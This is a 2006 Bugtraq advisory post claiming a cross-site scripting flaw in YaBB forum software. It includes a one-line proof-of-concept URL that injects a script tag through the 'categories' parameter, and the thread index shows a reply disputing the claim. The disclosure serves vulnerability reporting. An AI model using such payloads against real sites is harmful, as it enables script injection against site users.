Bugtraq mailing list archives
Yabb XSS
From: Outlaw () aria-security net
Date: 10 Aug 2006 04:13:34 -0000
###########################################################################################
#Aria-Security.net Advisory #
#Discovered by: OUTLAW #
#< www.Aria-security.net > #
#Gr33t to: A.u.r.a & C0d3r & l2odon & R@1D3N @ DrtRp & #
###########################################################################################
#Software: YaBB
#Attack method: Cross Site Scripting
#
#
#Proof of Concept:
#
#index.php?action=faqmy&myfaq=yes&id_cat=1&categories=<script>alert("xss")</script>
#
#----------------------------------------------------------
#
#Solution
#
#No Solutions
#
#Contact : Outlaw () aria-security net
#
Current thread:
- Yabb XSS Outlaw (Aug 10)
- Re: Yabb XSS - or NOT Volker Tanger (Aug 14)